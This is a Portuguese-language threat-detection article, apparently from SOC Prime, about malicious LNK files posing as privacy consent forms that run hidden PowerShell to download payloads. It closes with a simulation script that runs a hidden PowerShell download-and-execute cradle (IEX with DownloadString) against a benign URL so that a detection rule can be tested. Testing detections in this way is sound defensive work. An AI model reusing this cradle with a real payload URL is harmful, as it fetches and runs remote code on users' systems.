SOC Prime Bias: Alto

19 Jun 2026 07:26 UTC

O Que Realmente Estava Dentro do Arquivo de Atalho Disfarçado como um Formulário de Consentimento de Privacidade?

Author Photo
SOC Prime Team linkedin icon Seguir
O Que Realmente Estava Dentro do Arquivo de Atalho Disfarçado como um Formulário de Consentimento de Privacidade?
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

Atores de ameaças estão distribuindo arquivos LNK maliciosos disfarçados como formulários de consentimento de privacidade para enganar os usuários a abri-los. Quando executados, esses arquivos de atalho lançam comandos PowerShell ofuscados que recuperam e executam cargas adicionais usando técnicas sem arquivo. A cadeia de ataque é projetada para roubar informações e implantar um carregador de backdoor que ajuda a preservar o acesso e a persistência.

Investigação

A investigação mostrou que os arquivos LNK embutem código PowerShell ofuscado responsável por baixar scripts posteriores. Esses scripts secundários incluem um downloader que obtém cargas úteis de serviços web legítimos e um carregador que os executa diretamente na memória. O autor da ameaça também abusa do Agendador de Tarefas do Windows para persistência e usa documentos de isca para fazer parecer que a atividade maliciosa é legítima.

Mitigação

As organizações devem impor verificação rigorosa de extensões de arquivos e alertar os usuários sobre arquivos LNK disfarçados como documentos comuns. As equipes de segurança devem monitorar de perto a atividade do Agendador de Tarefas, logs de execução do PowerShell e conexões de rede de saída. Os usuários também devem ser treinados para validar tanto o remetente quanto o caminho de entrega de qualquer arquivo recebido antes de abri-lo.

Resposta

Se essa atividade for detectada, os administradores devem revisar imediatamente entradas suspeitas do Agendador de Tarefas e a criação incomum de scripts PowerShell em diretórios acessíveis por usuários. Os logs do PowerShell devem ser analisados e as conexões externas devem ser rastreadas, especialmente aquelas envolvendo plataformas de nuvem legítimas ou serviços de armazenamento web. Uma investigação forense completa deve ser realizada em quaisquer scripts maliciosos identificados e tráfego de rede não autorizado.

Fluxo de Ataque

Execução de Simulação

Pré-requisito: O Cheque Pré-Voo de Telemetria e Base deve ter passado.

Justificativa: Esta seção detalha a execução precisa da técnica adversária (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a diagnósticos errados.

  • Narrativa do Ataque & Comandos: O adversário busca estabelecer acesso inicial e baixar uma carga de malware de segunda fase. Para evitar a detecção por scanners de arquivos simples, usam um arquivo LNK (Atalho). Este arquivo LNK é projetado para executar powershell.exe em uma janela oculta. O comando passado para o PowerShell usa Invoke-Expression and DownloadString para puxar um script de uma URL remota. Isso imita ataques reais de “Living-off-the-Land” (LotL) onde binários legítimos são usados para executar ações maliciosas, visando burlar antivírus baseados em assinaturas tradicionais.

  • Script de Teste de Regressão:

    # 1. Defina a URL de destino (usando um site benigno para teste)
    $url = "https://www.google.com"
    
    # 2. Crie a string de carga útil maliciosa de PowerShell
    # Esta string é projetada para acionar a detecção de 'DownloadString' e 'Invoke-Expression'
    $payload = "IEX (New-Object Net.WebClient).DownloadString('$url')"
    
    # 3. Crie um conteúdo de arquivo LNK fictício (Simulado)
    # Em um ataque real, este seria um arquivo .lnk binário. 
    # Aqui executamos o comando diretamente para garantir que o log ScriptBlock seja gerado para validação.
    Write-Host "[+] Simulando execução maliciosa de PowerShell via carga útil LNK..."
    powershell.exe -WindowStyle Hidden -Command $payload
    
    Write-Host "[+] Comando de simulação executado. Verifique o Evento ID 4104."
  • Comandos de Limpeza:

    # Remova quaisquer artefatos se arquivos foram criados
    Remove-Item -Path "$HOMEDesktopSimulated_Malicious_LNK.lnk" -ErrorAction SilentlyContinue
    Write-Host "[+] Limpeza completa."